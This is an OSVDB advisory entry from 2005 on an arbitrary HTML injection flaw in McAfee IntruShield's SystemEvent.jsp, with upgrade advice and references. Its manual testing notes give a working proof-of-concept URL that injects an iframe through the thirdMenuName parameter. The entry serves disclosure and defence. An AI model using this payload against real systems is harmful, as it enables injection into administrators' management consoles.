McAfee IntruShield SystemEvent.jsp Arbitrary HTML Injection

2005-07-06T14:57:41
ID OSVDB:17770
Type osvdb
Reporter OSVDB
Modified 2005-07-06T14:57:41

Description

Solution Description

Upgrade to version 2.1.9.17 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

https://[target]/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600></iframe>&severity=critical&count=1

References:

Vendor URL: http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm Security Tracker: 1014422 Secunia Advisory ID:15961 Related OSVDB ID: 17771 Related OSVDB ID: 17772 Related OSVDB ID: 17773 Related OSVDB ID: 17774 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0052.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0153.html CVE-2005-2186